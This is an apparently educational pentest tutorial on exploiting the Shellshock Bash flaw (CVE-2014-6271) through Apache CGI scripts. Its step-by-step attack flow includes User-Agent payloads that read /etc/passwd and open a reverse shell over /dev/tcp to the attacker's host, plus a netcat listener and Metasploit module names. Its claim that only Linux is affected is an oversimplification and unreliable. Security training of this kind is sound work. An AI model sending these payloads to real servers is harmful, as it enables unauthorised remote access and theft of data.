Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

CVE-2014-6271 - Shellshock

• Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash shell (since V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.

• The Shellshock vulnerability was discovered by Stéphane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.

• Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.

• The Shellshock vulnerability is caused by a vulnerability in Bash, whereby Bash mistakenly executes trailing commands after a series of characters: () {:;};.

• This vulnerability only affects Linux as Windows does not use utilize Bash as it is not a *Nix based operating system.

• In the context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.

• CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system, after which the output is displayed to the client.

Shellshock Exploitation

• In order to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash.

• In the context of an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server.

• Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.

• This vulnerability can be exploited both manually and automatically with the use of an MSF exploit module.

Attack Flow for Exploiting Shellshock Vulnerability

1. Identify the Target

Objective: Verify if the target system is running an Apache server.

Tool: Nmap

Command:

nmap -sV <target_ip>

Explanation: This command scans the target IP to identify open ports and services. Look for Apache in the service list.

2. Find the CGI Script

Objective: Determine the path of the CGI script that runs on the server.

Action: Access the web application and examine the page source for the CGI script path.

Explanation: Look for a .cgi or .pl file in the source code. This is the script that you will target for the Shellshock exploit.

3. Check for Shellshock Vulnerability

Objective: Test if the CGI script is vulnerable to the Shellshock exploit.

Action: Use the Nmap script to check for Shellshock vulnerability.

nmap -sV <target_ip> --script=http-shellshock --script-args "http-shellshock.uri=<cgi_file_path>"

Explanation: This command uses the http-shellshock script to test the specified CGI script for the Shellshock vulnerability.

4. Set Up Burp Suite

Objective: Intercept and modify the HTTP request to exploit Shellshock.

Action: Configure Burp Suite to act as a proxy for your browser.

Explanation: This will allow you to capture and manipulate HTTP requests to the server.

5. Intercept the Request

Objective: Modify the HTTP request to include the Shellshock payload.

Action: Use Burp Suite’s Repeater tool to forward the captured request.

Payload for Checking Vulnerability:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Explanation: This payload checks if the server is vulnerable by attempting to execute a command to read the /etc/passwd file.

6. Exploit Shellshock for Reverse Shell

Objective: Gain a reverse shell on the target server.

Action: Use the following payload to create a reverse shell.

Payload for Reverse Shell:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/<your_ip>/<your_port> 0>&1'

Explanation: This payload initiates a reverse shell connection from the target server to your machine.

7. Set Up a Listener

Objective: Prepare your system to receive the reverse shell connection.

Action: Run a Netcat listener on your machine.

nc -nvlp 1234

Explanation: This command listens for incoming connections on port 1234. Adjust the port number if needed.

8. Send the Exploit Request

Objective: Trigger the Shellshock exploit to establish the reverse shell.

Action: Send the modified HTTP request with the reverse shell payload through Burp Suite.

Explanation: Once sent, the target server will connect back to your Netcat listener, providing you with a reverse shell.

Worth Noting

It's worth noting that this vulnerability can also be exploited using the Metasploit framework. There are two modules available:

1. auxiliary/scanner/http/apache_mod_cgi_bash_env: This module checks for the presence of CGI scripts and whether the server is vulnerable to the Shellshock exploit.

2. exploit/multi/http/apache_mod_cgi_bash_env_exe: This module exploits the Shellshock vulnerability to gain a reverse shell using Meterpreter.

Hacker's Mantra:I really didn’t understand why hackers would want to hack into a classroom. Are they going to learn algebra? Maybe calculus? - Eric Yuan